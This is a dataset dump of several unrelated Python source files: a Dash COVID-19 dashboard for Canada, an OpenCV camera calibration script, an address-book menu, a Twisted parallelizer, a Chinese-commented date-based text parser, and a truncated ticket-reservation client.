\t\t\t\tstyle = {'backgroundColor': colors['background'],\n \t\t\t\t\t\t'color': colors['text'],\n \t\t\t\t\t\t'marging-left': '15'}),\n\n \t\t\tdcc.RadioItems(\n \t\t\t\tid = 'calculation-type',\n \t\t\t\toptions = [{'label':i, 'value':i} for i in ['Cumulative Cases', 'New Cases']],\n \t\t\t\tvalue = 'Cumulative Cases',\n \t\t\t\tlabelStyle = {'display': 'inline-block'},\n \t\t\t\tstyle = {'background': colors['background'], 'color': colors['text']}\n \t\t\t\t)\n \t\t\t], style = { 'padding-left': 70, 'padding-top': 30}),\n \t\t# line chart\n \t\thtml.Div([\n \t\t\thtml.Div([\n \t\t\t\tdcc.Graph(id = 'line-by-province'),\n \t\t\t\t],),\n\n \t\t], style = {'backgroundColor': colors['background']}), \n\n \t], className = 'seven columns'), # end of selectors + line charts\n\n # \t\t# table\n\t\thtml.Div([\n\t\t\thtml.P('Distribution of cases in regions of a province/ territory',\n\t\t\t\tstyle = {'color': colors['text'], 'padding-bottom': 20}),\n\t\t\thtml.Div(id = 'datatable'),\n\t\t\t], className = 'five columns', style={'margin-top': 100}),\n\n\n ], className = 'row', style = {'margin-top': 70}), # end of province div\n\n\n\n # other stats\n html.Div([\n \t# the tab selector\n \tdcc.Tabs(\n \t\tid = 'stats-tab',\n \t\tvalue = 'mortality-tab',\n \t\tchildren = [\n \t\t\t\t\tdcc.Tab(label = 'Mortality', value = 'mortality-tab', \n \t\t\t\t\t\tstyle = tab_style, selected_style = tab_selected_style),\n \t\t\t\t\tdcc.Tab(label = 'Recovered', value = 'recover-tab',\n \t\t\t\t\t\tstyle = tab_style, selected_style = tab_selected_style),\n \t\t\t\t\tdcc.Tab(label = 'Testing', value = 'testing-tab',\n \t\t\t\t\t\tstyle = tab_style, selected_style = tab_selected_style)\n \t\t\t\t\t],\n \t\tstyle = tabs_styles,),\n\n \tdcc.Graph(id = 'other-stats'),\n \t], style = {'margin-top': 70}),\n\n # sankey diagram\n html.Div([\n html.Div(children = ['At this moment, more than half of COVID-19 cases in Canada related to community transmission. \\\n But at the early stage of the outbreak, the majority were due to traveling. \\\n The lack of a universal reporting format among provinces and territories makes it hard to have \\\n a clear picture of how human migration across borders initiated the spread within Canada. \\\n Less than 10 percent of cases reported by governments indicating whether there was a travel history \\\n and even a smaller fraction of reported cases indicating where this patient had traveled to. \\\n The data is not perfect. However, the graphic below can still try to visualize where the early \\\n waves of cases came from.'],\n style={ 'textAlign': 'left',\n 'color': colors['text'],\n 'padding-left': 70,\n 'padding-right': 70,\n 'padding-top': 70}\n ),\n\n \tdcc.Graph(\n \t\tid = 'sankey',\n \t\tfigure = genSankey(sankey_df, cat_cols = ['from', 'to'], value_cols = 'count'),\n \t\t)\n \t]),\n\n # credits\n html.Div([\n \thtml.P('Developed by Yang Sun'),\n \thtml.A('DataLabTo', href = 'http://www.datalabto.ca/about/', target = '_blank',),\n \thtml.Br(),\n \thtml.A('Contact', href = 'mailto:sun.yang.ys57f@gmail.com'),\n \t], className = \"twelve columns\", \n \t style = {'fontSize': 15, 'padding-bottom': 30, 'padding-top': 30,\n \t \t\t\t'textAlign': 'center', \n \t \t\t\t'backgroundColor': colors['background'],\n \t \t\t\t'color': colors['text'],}),\n\n]) # end of global div\n\n\n# ------------ Part Three. Callbacks --------------------\n@app.callback(\n\tOutput('canada-line', 'figure'),\n\t[Input('scale-type', 'value')]\n\t)\ndef canada_line_update(yaxis_type):\n\n\treturn{\n\n\t\t'data': [dict(x = canada.index, \n\t\t\t\ty = canada.cumu, \n\t\t\t\ttype = 'line', \n\t\t\t\tname = 'Cumulative cases',\n\t\t\t\tmarker = {'color': colors['line']}),\n\t\t\t\tdict(x = canada.index, \n\t\t\t\t\ty = canada.date_report, \n\t\t\t\t\ttype = 'bar', \n\t\t\t\t\tname = 'New confirmed',\n\t\t\t\t\tmarker = {'color': colors['bar']})],\n\t\t'layout': dict(\n\t\t\tplot_bgcolor = colors['background'],\n\t\t\tpaper_bgcolor = colors['background'],\n\t\t\tfont = dict(color = colors['text']),\n\t\t\txaxis = {'gridcolor': colors['grid'], 'gridwidth': 0.05},\n\t\t\tyaxis = {'gridcolor': colors['grid'], 'gridwidth': 0.05,\n\t\t\t\t\t'title': 'No. of cases',\n\t\t\t\t\t'type': 'linear' if yaxis_type == 'Linear' else 'log'},\n\t \t legend={ 'x':0, 'y':1},\n\t \t margin = {'l':90, 'b':40, 't':10, 'r':40}\n\t\t\t)\n\n\t\t}\n\n\n\n@app.callback(\n\tOutput('line-by-province', 'figure'),\n\t[Input('province-select', 'value'),\n\tInput('calculation-type', 'value')]\n\t)\ndef update_line_chart(province, calculation_type):\n\tdf_province = pd.DataFrame(dff[dff.province == province].index.value_counts()).reset_index()\n\tdf_province = df_province.set_index('index')\n\tdf_province = df_province.resample('d').sum().fillna(0)\n\tdf_province['cumu'] = df_province['date_report'].cumsum()\n\n\tif calculation_type == 'New Cases':\n\t\treturn {\n\n\t\t\t'data':[dict(\n\t\t\t\tx = df_province.index,\n\t\t\t\ty = df_province.date_report,\n\t\t\t\ttype = 'bar',\n\t\t\t\tmarker = {'color': colors['bar']}\n\t\t\t\t)\n\t\t\t],\n\t\t\t'layout': dict(\n\t\t\t\tyaxis = {'title': 'No. of new cases'},\n\t\t\t\tplot_bgcolor = colors['background'],\n\t\t\t\tpaper_bgcolor = colors['background'],\n\t\t\t\tfont = {'color': colors['text']},\n\t\t\t\tmargin = {'l':90, 'b':40, 't':10, 'r':40}\n\n\t\t\t\t)\n\t\t}\n\telse: \n\t\treturn {\n\n\t\t\t'data':[dict(\n\t\t\t\tx = df_province.index,\n\t\t\t\ty = df_province.cumu,\n\t\t\t\ttpye = 'line',\n\t\t\t\tmarker = {'color': colors['line']}\n\t\t\t\t)\n\t\t\t],\n\t\t\t'layout': dict(\n\t\t\t\tyaxis = {'title': 'No. of cumulative cases'},\n\t\t\t\tplot_bgcolor = colors['background'],\n\t\t\t\tpaper_bgcolor = colors['background'],\n\t\t\t\tfont = {'color': colors['text']},\n\t\t\t\tmargin = {'l':90, 'b':40, 't':10, 'r':40}\n\t\t\t\t)\n\t\t}\n\n\n\n@app.callback(\n\tOutput('datatable', 'children'),\n\t[Input('province-select', 'value')]\n\t)\ndef update_datatable(province):\n\tprovince_counts = pd.DataFrame(df[df['province'] == province]['health_region'].value_counts()).reset_index().\\\n\t\t\t\t\t rename(columns = {'index': 'REGION', 'health_region': 'CONFIRMED CASES'})\n\tcolumns = [{'name': i, 'id': i} for i in province_counts.columns]\n\tdata = province_counts.to_dict('records')\n\treturn dt.DataTable(data = data, \n\t\t\t\t\t columns = columns, \n\t\t\t\t\t page_size = 10,\n\t\t\t\t\t style_cell = {'backgroundColor': colors['background'], 'color': colors['text']},\n\t\t\t\t\t style_header = {\n\t\t\t\t\t \t'fontWeight': 'bold',\n\t\t\t\t\t \t'backgroundColor': tab_selected_style['backgroundColor'],\n\t\t\t\t\t })\n\n\n\n@app.callback(\n\tOutput('other-stats', 'figure'),\n\t[Input('stats-tab', 'value')]\n\t)\ndef update_stats_graph(tab):\n\tif tab == 'mortality-tab':\n\t\treturn {\n\n\t\t\t'data':[dict(\n\t\t\t\tx = mortality.province.value_counts().index,\n\t\t\t\ty = mortality.province.value_counts().values,\n\t\t\t\ttype = 'bar',\n\t\t\t\tmarker = {'color': colors['bar']},\n\t\t\t\t)\n\t\t\t],\n\t\t\t'layout': stats_charts_style\n\t\t}\n\tif tab == 'recover-tab':\n\t\treturn {\n\n\t\t\t'data':[dict(\n\t\t\t\tx = recovered.groupby('province').cumulative_recovered.max().sort_values(ascending=False).index,\n\t\t\t\ty = recovered.groupby('province').cumulative_recovered.max().sort_values(ascending=False).values,\n\t\t\t\ttype = 'bar',\n\t\t\t\tmarker = {'color': colors['bar']},\n\t\t\t\t)\n\t\t\t],\n\t\t\t'layout': stats_charts_style\n\t\t}\n\telse:\n\t\treturn {\n\n\t\t\t'data':[dict(\n\t\t\t\tx = testing.groupby('province').cumulative_testing.max().sort_values(ascending=False).index,\n\t\t\t\ty = testing.groupby('province').cumulative_testing.max().sort_values(ascending=False).values,\n\t\t\t\ttype = 'bar',\n\t\t\t\tmarker = {'color': colors['bar']},\n\t\t\t\t)\n\t\t\t],\n\t\t\t'layout': stats_charts_style\n\t\t}\n\n\nif __name__ == '__main__':\n app.run_server(debug=True)\n\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":18010,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"9515314","text":"#!/usr/bin/python3\n# coding=utf-8\nimport sys, os\nimport cv2\nimport numpy as np\nimport pandas as pd\nfrom scipy.optimize import least_squares\nimport scipy.linalg as linalg\n\n\nPROJECT_NAME = \"Computer Vision Demonstration Project 2 - Requirement 3\"\nPROJECT_DESC = \"Extrisic Calibration\"\nSNAPSHOT_WIN = \"Snapshot\"\nUNDISTORT_WIN = \"Undistort\"\nRAW_WIN = \"RAW Video\"\n\nCIRCLE_RADIUS = 5\nCIRCLE_COLOR = (0,0,255)\nRULLER_COLOR = (255,0,0)\n\nBOARD_W = 8;\nBOARD_H = 6;\n\nraw_click_count = 0\nraw_p1 = (0,0)\nraw_p2 = (0,0)\n\nund_click_count = 0\nund_p1 = (0,0)\nund_p2 = (0,0)\n\n\n\n\n\ndef calibrate():\n\n width = 20.4 / BOARD_W\n heigth = 14.6 / BOARD_H\n\n WRL = np.zeros((48,2))\n\n i = 0\n for y in range(BOARD_H):\n for x in range(BOARD_W):\n WRL[i] = ((x * width), (y * heigth))\n i += 1\n\n fs = cv2.FileStorage('intrinsics.xml', cv2.FILE_STORAGE_READ)\n intrinsics = fs.getNode('floatdata').mat()\n fs.release()\n\n fs = cv2.FileStorage('distortion.xml', cv2.FILE_STORAGE_READ)\n distortion = fs.getNode('floatdata').mat()\n fs.release()\n\n criteria = (cv2.TERM_CRITERIA_EPS + cv2.TERM_CRITERIA_MAX_ITER, 30, 0.001)\n\n cap = cv2.VideoCapture(0)\n ret, frame = cap.read()\n h, w = frame.shape[:2]\n\n newcameramtx, roi = cv2.getOptimalNewCameraMatrix(intrinsics, distortion, (w, h), 1, (w, h))\n\n mapx, mapy = cv2.initUndistortRectifyMap(intrinsics, distortion, None, newcameramtx, (w, h), 5)\n\n cv2.namedWindow(UNDISTORT_WIN) # Create a named window\n cv2.moveWindow(UNDISTORT_WIN, 10, 10)\n cv2.namedWindow(RAW_WIN) # Create a named window\n cv2.moveWindow(RAW_WIN, 650, 10)\n\n found = False\n exit = False\n start = False\n\n print(\"setup camera and chessboard and press s to start...\")\n print(\"press q to quit without finding chessboard...\")\n\n while (not found) and (not exit):\n\n # Capture frame-by-frame\n ret, frame = cap.read()\n\n if ret:\n\n #frame = cv2.flip(f, 1)\n\n frame_gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n\n undist = cv2.remap(frame, mapx, mapy, cv2.INTER_LINEAR)\n\n undist_gray = cv2.cvtColor(undist, cv2.COLOR_BGR2GRAY)\n\n ret, corners = cv2.findChessboardCorners(undist_gray, (BOARD_W, BOARD_H), None)\n\n if start and ret and (len(corners) == BOARD_W * BOARD_H):\n\n found = True\n\n CAM = cv2.cornerSubPix(undist_gray, corners, (11, 11), (-1, -1), criteria)\n\n # Draw and display the corners\n undist = cv2.drawChessboardCorners(undist, (BOARD_W, BOARD_H), CAM, ret)\n\n # Display the resulting frame\n cv2.imshow(UNDISTORT_WIN, undist) # Se achou mostra snapshot colorido\n else:\n cv2.imshow(UNDISTORT_WIN, undist_gray) # Se nao achou mostra snapshot p&b\n\n # Display the resulting frame\n cv2.imshow(RAW_WIN, frame)\n\n key = cv2.waitKey(3)\n\n if key& 0xFF == ord('s'):\n start = True\n if key & 0xFF == ord('q'):\n return\n\n CAM = CAM.reshape(48,2)\n\n A = np.zeros((2*BOARD_W*BOARD_H, 9))\n\n for i in range(BOARD_W*BOARD_H):\n A[i*2] = (\n WRL[i][0], # X\n WRL[i][1], # Y\n 1, # 1\n 0, # 0\n 0, # 0\n 0, # 0\n - CAM[i][0] * WRL[i][0], # -xX\n - CAM[i][0] * WRL[i][1], # -xY\n - CAM[i][0] # x\n )\n A[(i*2)+1] = (\n 0, # 0\n 0, # 0\n 0, # 0\n WRL[i][0], # X\n WRL[i][1], # Y\n 1, # 1\n - CAM[i][1] * WRL[i][0], # -yX\n - CAM[i][1] * WRL[i][1], # -yY\n - CAM[i][1] # y\n )\n\n #np.set_printoptions(linewidth=160)\n\n U, s, Vh = linalg.svd(A)\n\n V = np.transpose(Vh)\n\n P = np.array([row[8] for row in V]).reshape((3,3))\n\n p = P.reshape(9)\n\n X = np.array([row[0] for row in WRL])\n Y = np.array([row[1] for row in WRL])\n\n x = np.array([row[0] for row in CAM])\n y = np.array([row[1] for row in CAM])\n\n def func(p, x, y, X, Y):\n\n proj_x = (p[0]*X + p[1]*Y + p[2]) / (p[6]*X + p[7]*Y + p[8])\n\n proj_y = (p[3]*X + p[4]*Y + p[5]) / (p[6]*X + p[7]*Y + p[8])\n\n r = (x - proj_x) ** 2 + (y - proj_y) ** 2\n\n return r\n\n res = least_squares(func, p, args=(np.array(x), np.array(y), np.array(X), np.array(Y)), max_nfev=9000, verbose=0)\n\n new_P = res.x.reshape((3, 3))\n\n H = np.array(np.matmul(linalg.inv(intrinsics) , new_P))#@\n\n h1 = np.array([row[0] for row in H])\n h2 = np.array([row[1] for row in H])\n\n _R = (2/(linalg.norm(h1) + linalg.norm(h2))) * H\n\n t = np.array([row[2] for row in _R])\n\n r1 = np.array([row[0] for row in _R])\n r2 = np.array([row[1] for row in _R])\n r3 = r1 * r2\n\n _R = np.append(np.append(r1, r2), r3).reshape((3,3))\n\n U, s, Vh = linalg.svd(_R)\n\n R = np.matmul(U, Vh) # @\n\n r = np.array([row[:2] for row in R])\n print(\"\\nr (rotation matrix:\")\n print(r)\n\n print(\"\\nt (translation vector:\")\n print(t)\n print(\"\\n||t||:\", linalg.norm(t))\n\n fs = cv2.FileStorage('rotation.xml', cv2.FILE_STORAGE_WRITE)\n fs.write(\"floatdata\", r)\n fs.release()\n\n fs = cv2.FileStorage('translation.xml', cv2.FILE_STORAGE_WRITE)\n fs.write(\"floatdata\", t)\n fs.release()\n # When everything done, release the capture\n cap.release()\n cv2.destroyAllWindows()\n cv2.namedWindow(UNDISTORT_WIN) # Create a named window\n cv2.moveWindow(UNDISTORT_WIN, 10, 10)\n cv2.namedWindow(RAW_WIN) # Create a named window\n cv2.moveWindow(RAW_WIN, 650, 10)\n\n\ndef do_the_job():\n calibrate()\n\n# Main Function\ndef Run():\n\n print(\"\\n%s\\n%s\" % (PROJECT_NAME, PROJECT_DESC))\n print(\"\\nTested with python3.6.4, opencv 3 and opencv-python 3.4.0\")\n\n print(\"\\nCurrent opencv-python version: %s\\n\" % cv2.__version__)\n\n if len(sys.argv) != 1:\n print('\\nSyntax: %s\\n' % sys.argv[0])\n sys.exit(-1)\n\n do_the_job()\n\nif __name__ == '__main__':\n Run()\n","sub_path":"Multiple_View/ref/req3.py","file_name":"req3.py","file_ext":"py","file_size_in_byte":6450,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"542225862","text":"from classAddress import Address as CA\nfrom classCollection import CollectionAddress as CC\nfrom classCollectionCaretaker import CollectionCaretaker\nfrom decorator import *\n\ndef main():\n options = '1 - insert collection from file\\n2 - print collection\\n3 - sort\\n4 - search\\n5 - delete obj\\n6 - add new obj\\n7 - edit obj\\n8 - show history\\n9 - undo\\n10 - redo\\n11 - exit\\n'\n collect = CC()\n caretaker = CollectionCaretaker(collect)\n while True:\n try:\n print(options)\n choice = enterIntInRange(0, 'Enter choice : ', 0, 11)\n\n if choice == 1: readFromFileMenu(caretaker, collect)\n elif choice == 2: print(collect)\n elif choice == 3: sortMenu(caretaker, collect)\n elif choice == 4: searchMenu(collect)\n elif choice == 5: deleteMenu(caretaker, collect)\n elif choice == 6: newObjMenu(caretaker, collect)\n elif choice == 7: editObjMenu(caretaker, collect)\n elif choice == 8: mementoHistoryMenu(caretaker)\n elif choice == 9: undoMenu(caretaker, collect) \n elif choice == 10: redoMenu(caretaker, collect)\n elif choice == 11: break\n\n except Exception as e:\n print('Error ', '--'*20, ' ',e)\n\ndef readFromFileMenu(caretaker, collect):\n caretaker.backup()\n collect.readJsonFile('data.json')\n collect.writeJsonFile(\"output.json\")\n\ndef sortMenu(caretaker, collect):\n attr = enterStr('0', 'Enter attribute: ')\n caretaker.backup()\n collect.sort(attr)\n collect.writeJsonFile(\"output.json\")\n\ndef searchMenu(collect):\n value = enterStr('0', \"Enter search elem - \")\n collect.search(value)\n\ndef deleteMenu(caretaker, collect):\n index = enterIntInRange(0, f'Enter index from 0 to {len(collect) - 1}: ', 0, len(collect) -1)\n caretaker.backup()\n collect.deleteElem(index)\n collect.writeJsonFile(\"output.json\")\n\ndef newObjMenu(caretaker, collect):\n caretaker.backup()\n collect.addNewAddress()\n collect.writeJsonFile(\"output.json\")\n\ndef editObjMenu(caretaker, collect):\n caretaker.backup()\n collect.editAddress()\n collect.writeJsonFile(\"output.json\")\n\ndef mementoHistoryMenu(caretaker):\n caretaker.show_history()\n\ndef undoMenu(caretaker, collect):\n caretaker.undo()\n collect.writeJsonFile(\"output.json\")\n\ndef redoMenu(caretaker, collect):\n caretaker.redo()\n collect.writeJsonFile(\"output.json\")\n\nif __name__ == '__main__':\n main()\n","sub_path":"Python/Programming/UnitTests/programmingTask6.py","file_name":"programmingTask6.py","file_ext":"py","file_size_in_byte":2467,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"119242316","text":"# -*- test-case-name: twext.python.test.test_parallel -*-\n##\n# Copyright (c) 2012-2014 Apple Inc. All rights reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n##\n\n\"\"\"\nUtilities for parallelizing tasks.\n\"\"\"\n\nfrom twisted.internet.defer import inlineCallbacks, DeferredList, returnValue\n\nclass Parallelizer(object):\n \"\"\"\n Do some operation with a degree of parallelism, using a set of resources\n which may each only be used for one task at a time, given some underlying\n API that returns L{Deferreds}.\n\n @ivar available: A list of available resources from the C{resources}\n constructor parameter.\n\n @ivar busy: A list of resources which are currently being used by\n operations.\n \"\"\"\n\n def __init__(self, resources):\n \"\"\"\n Initialize a L{Parallelizer} with a list of objects that will be passed\n to the callables sent to L{Parallelizer.do}.\n\n @param resources: objects which may be of any arbitrary type.\n @type resources: C{list}\n \"\"\"\n self.available = list(resources)\n self.busy = []\n self.activeDeferreds = []\n\n\n @inlineCallbacks\n def do(self, operation):\n \"\"\"\n Call C{operation} with one of the resources in C{self.available},\n removing that value for use by other callers of C{do} until the task\n performed by C{operation} is complete (in other words, the L{Deferred}\n returned by C{operation} has fired).\n\n @param operation: a 1-argument callable taking a resource from\n C{self.active} and returning a L{Deferred} when it's done using\n that resource.\n @type operation: C{callable}\n\n @return: a L{Deferred} that fires as soon as there are resources\n available such that this task can be I{started} - not completed.\n \"\"\"\n if not self.available:\n yield DeferredList(self.activeDeferreds, fireOnOneCallback=True,\n fireOnOneErrback=True)\n active = self.available.pop(0)\n self.busy.append(active)\n o = operation(active)\n def andFinally(whatever):\n self.activeDeferreds.remove(o)\n self.busy.remove(active)\n self.available.append(active)\n return whatever\n self.activeDeferreds.append(o)\n o.addBoth(andFinally)\n returnValue(None)\n\n\n def done(self):\n \"\"\"\n Wait until all operations started by L{Parallelizer.do} are completed.\n\n @return: a L{Deferred} that fires (with C{None}) when all the currently\n pending work on this L{Parallelizer} is completed and C{busy} is\n empty again.\n \"\"\"\n return (DeferredList(self.activeDeferreds)\n .addCallback(lambda ignored: None))\n","sub_path":"twext/trunk/twext/python/parallel.py","file_name":"parallel.py","file_ext":"py","file_size_in_byte":3281,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"590845501","text":"# 当前文件名\nmo = __file__[__file__.rfind('/')+1:]\n\n# 数据结构\nchaos = []\n\n\n# Time\n# 用来指示时间,读取文本时候会判断时间,然后把文本装进对应时间的数据结构里\nclass Time:\n zone = 0\n year = -10000\n month = 0\n day = 0\n\n @classmethod\n def reset(cls):\n Time.zone = 0\n Time.year = -100000\n Time.month = 0\n Time.day = 0\n\n @classmethod\n def set_zone(cls,num):\n Time.zone = num\n \n @classmethod\n def set_year(cls,num):\n Time.year = num\n\n @classmethod\n def set_month(cls,num):\n Time.month = num\n\n @classmethod\n def set_day(cls,num):\n Time.day = num\n \n @classmethod\n def display(cls):\n if Time.zone == 0:\n print('\\n无时间域\\n')\n elif Time.zone == 1:\n print(f'\\n现在是{Time.year}年\\n')\n elif Time.zone == 2:\n print(f'\\n现在是{Time.year}年{Time.month}月\\n')\n elif Time.zone == 3:\n print(f'\\n现在是{Time.year}年{Time.month}月{Time.day}日\\n')\n\n\n\n\n# Year\n# 表示年的类,可以用来装某年对应的文本\n# 类属性\n# Year.years 字典,年份-对象 int-\n# 实例属性\n# self.year = int 记录年份\n# self.content = list 记录内容\n# self.months = dict 记录月份与对应的对象实例 int-\n# 类方法\n# Year.newyear(num) 创建一个新年份,年份是num\n# Year.get_year(year) 返回某年的实例对象\n# Year.addcontent_Year(year,str) 往某年中加内容\n# Year.check_year_existed(year) 检查num年是否存在\n# Year.get_yearlist_ordered() 返回一个已有年份的列表\n# Year.get_monthlist_ordered(year) 返回某年的已有月份列表\n# Year.check_month_in_year(year,month) 检查某年是否有某月\n# Year.newmonth(year,month) 在某年中创建某月的Month实例\n# Year.get_month(year,month) 得到某年的某月的Month实例\nclass Year:\n # 所有year的字典,key-value是年份-对象 int-\n years = {}\n def __init__(self,year):\n self.year = year\n self.content = []\n self.months = {}\n # 初始化某年\n @ classmethod\n def newyear(cls,num):\n if Year.check_year_existed(num):\n raise Exception(f'创建失败,{num}年已经存在!')\n Year.years[num] = Year(num)\n # 返回一个从小到大排序好的yearlist列表\n @classmethod\n def get_yearlist_ordered(cls):\n yearlist = list(Year.years.keys())\n return sorted(yearlist)\n # 检查某年是否已经存在\n @classmethod\n def check_year_existed(cls,year):\n yearlist = Year.get_yearlist_ordered()\n for item in yearlist:\n if item == year:\n return True\n return False\n @classmethod\n def get_year(cls,year):\n return Year.years[year]\n @classmethod\n def get_monthlist_ordered(cls,year):\n monthlist = list(Year.get_year(year).months.keys())\n return sorted(monthlist)\n @classmethod\n def check_month_in_year(cls,year,month):\n monthlist_in_year = Year.get_monthlist_ordered(year)\n for item in monthlist_in_year:\n if item == month:\n return True\n return False\n @classmethod\n def newmonth(cls,year,month):\n if Year.check_month_in_year(year,month):\n raise Exception(f'创建月份失败,{year}年中{month}月已存在!')\n Year.get_year(year).months[month] = Month(month)\n @classmethod\n def get_month(cls,year,month):\n if not Year.check_month_in_year(year,month):\n raise Exception(f'获取失败,{year}年中{month}月不存在!')\n return Year.get_year(year).months[month]\n @classmethod\n def addcontent_Year(cls,year,str):\n if not Year.check_year_existed(year):\n raise Exception(f'添加内容失败,{year}年还不存在,请创建后再往里添加内容')\n Year.get_year(year).content.append(str)\n\n\n\n\n\n\n\n\n# Month \n# 表示月的类,可以用来装某年某月对应的文本\n# 实例属性\n# self.month = int 记录月份\n# self.content = list 记录内容\n# self.days = dict 记录日子以及对应的实例\n# 实例方法\n# self.addcontent_Month(str) 给该月份加内容\n# self.get_daylist_ordered() 返回一个该月份实例的日子时序列表\n# self.check_day_in_month(day) 检查该月份中是否有某日\n# self.newday(day) 给某月创建某日\n# self.get_day(day) 获取某日的实例对象\nclass Month:\n def __init__(self,month):\n self.month = month\n self.content = []\n self.days = {}\n def addcontent_Month(self,str):\n self.content.append(str)\n def get_daylist_ordered(self):\n daylist = list(self.days.keys())\n return sorted(daylist)\n def check_day_in_month(self,day):\n for item in self.get_daylist_ordered():\n if item == day:\n return True\n return False\n def newday(self,day):\n if self.check_day_in_month(day):\n raise Exception('创建day实例失败,指定day已经存在!')\n self.days[day] = Day(day)\n def get_day(self,day):\n if not self.check_day_in_month(day):\n raise Exception('获取day实例失败,指定day不存在!')\n return self.days[day]\n\n\n\n\n\n\n\n# Day\n# 表示日的类,可以用来装某年某月某日对应的文本\n# 实例属性\n# self.day = int 记录日子\n# self.content = list 记录内容\n# 实例方法\n# self.addcontent_Day(str) 为Day实例添加内容\nclass Day:\n def __init__(self,day):\n self.day = int (day)\n self.content = []\n def addcontent_Day(self,str):\n self.content.append(str)\n\n\n\n\n\n\n# 根据一个lenth最多16的字符串来设定时间域\n# 返回值:0,1,2,3,6\n# 0 没改\n# 1 改年\n# 2 改月\n# 3 改日\n# 8 8数字改\ndef line_set_time(str):\n number = ''\n counter = 0\n nyr = [False,False,False]\n# 一次检测获取信息\n for char in str:\n if char =='#':\n counter +=1\n if char.isdigit():\n number = number + char\n if char == '年':\n nyr[0] = True\n if char == '月':\n nyr[1] = True\n if char == '日' or char == '号':\n nyr[2] = True\n# 年月日判定最优先 \n if nyr == [True, False, False]:\n num_nyr = ['','','']\n for char in str:\n if char == '年':\n break\n if char.isdigit():\n num_nyr[0] = num_nyr[0] + char\n Time.set_zone(1)\n if num_nyr[0] !='':\n Time.set_year(int(num_nyr[0]))\n return (1,'\\n年月日检测,年改了\\n')\n\n if nyr == [False, True, False]:\n num_nyr = ['','','']\n for char in str:\n if char == '月':\n break\n if char.isdigit():\n num_nyr[1] = num_nyr[1] + char\n Time.set_zone(2)\n if num_nyr[1] !='':\n Time.set_month(int(num_nyr[1]))\n return (2,'\\n年月日检测,月改了\\n')\n\n if nyr == [False, False, True]:\n num_nyr = ['','','']\n for char in str:\n if char == '日' or char == '号':\n break\n if char.isdigit():\n num_nyr[2] += char\n Time.set_zone(3)\n if num_nyr[2] !='':\n Time.set_day(int(num_nyr[2]))\n return (3,'\\n年月日检测,日改了\\n')\n\n if nyr == [True,True,False]:\n num_nyr = ['','','']\n s = 0\n for char in str:\n if char == '年':\n s += 1\n if char == '月':\n break\n if char.isdigit():\n num_nyr[s] += char\n Time.set_zone(2)\n if num_nyr[0] !='':\n Time.set_year(int(num_nyr[0]))\n if num_nyr[1] !='':\n Time.set_month(int(num_nyr[1]))\n return (2,'\\n年月日检测,年月改了\\n')\n\n if nyr == [False,True,True]:\n num_nyr = ['','','']\n s = 1\n for char in str:\n if char == '月':\n s += 1\n if char == '日' or char == '号':\n break\n if char.isdigit():\n num_nyr[s] += char\n Time.set_zone(3)\n if num_nyr[1] !='':\n Time.set_month(int(num_nyr[1]))\n if num_nyr[2] !='':\n Time.set_day(int(num_nyr[2]))\n return (1,'\\n年月日检测,月日改了\\n')\n\n if nyr == [True,True,True]:\n num_nyr = ['','','']\n s = 0\n for char in str:\n if (char == '年') or (char == '月'):\n s += 1\n if char == '日' or char == '号':\n break\n if char.isdigit():\n num_nyr[s] += char\n Time.set_zone(3)\n if num_nyr[0] !='':\n Time.set_year(int(num_nyr[0]))\n if num_nyr[1] !='':\n Time.set_month(int(num_nyr[1]))\n if num_nyr[2] !='':\n Time.set_day(int(num_nyr[2]))\n return (1,'\\n年月日检测,年月日改了\\n')\n# 使用#的个数来确定年月日\n if counter == 2:\n if len(number)<5:\n Time.set_zone(1)\n Time.set_year(int(number))\n return (1,'\\n#\\n改了年\\n')\n if counter == 3:\n if len(number) < 3:\n Time.set_zone(2)\n Time.set_month(int(number))\n return (2,'\\n#\\n改了月\\n')\n if counter == 4:\n if len(number) < 3:\n Time.set_zone(3)\n Time.set_day(int(number))\n return (3,'\\n#\\n改了日\\n')\n# 八数字检测\n if len(number) >= 8:\n num_nyr = [number[0:4],number[4:6],number[6:8]]\n Time.set_zone(3)\n Time.set_year(int(num_nyr[0]))\n Time.set_month(int(num_nyr[1]))\n Time.set_day(int(num_nyr[2]))\n return (8,'\\n年月日改了,八数字版本\\n')\n \n\n if 0 0:\n self.minutes_left = int(minutes_float)\n self.seconds_left = int(\n (minutes_float - self.minutes_left) * 60\n )\n\n else:\n self.minutes_left = 0\n self.seconds_left = 0\n\n def delete(self):\n \"\"\"Cancels this reservation, returns True if successful.\"\"\"\n\n crypto_block = self._get_crypto_block_for_object(\n method_name='make_reservation',\n interface_object=self\n )\n\n resp_dict = self.get_core_api().release_reservation(\n crypto_block=crypto_block,\n upfront_data_token=self.settings['upfront_data_token'],\n )\n\n return resolve_boolean(\n resp_dict['released_ok']\n )\n\n def purchase_part_one(\n self, return_token, return_domain, return_path,\n return_with_https, encryption_key, customer=None,\n card=None\n ):\n \"\"\"First part of the 2 stage purchase process.\n\n See the XML API documentation for more information about the\n purchase process.\n\n Args:\n return_token (string): Unique token for this purchase call.\n return_domain (string): The domain for the return URL.\n return_path (string): The path for the return URL.\n return_with_https (boolean): Indicates whether the URL should use\n HTTP or HTTPS.\n encryption_key (string): Encryption key for data.\n customer (Customer): Optional, Customer object representing the\n customer making the purchase.\n card (Card): Optional, Card object representing the payment\n card information.\n\n Returns:\n Dictionary: A dictionary containing an item called\n 'redirect_html_page_data' with a string value of\n HTML that should be passed to the user's browser\n in order to perform the redirect.\n \"\"\"\n\n if card:\n card_data = dict_ignore_nones(**card._get_dict())\n else:\n card_data = None\n\n if customer:\n customer_data = dict_ignore_nones(**customer._get_dict())\n else:\n customer_data = None\n\n https_string = boolean_to_yes_no(\n return_with_https\n )\n\n crypto_block = 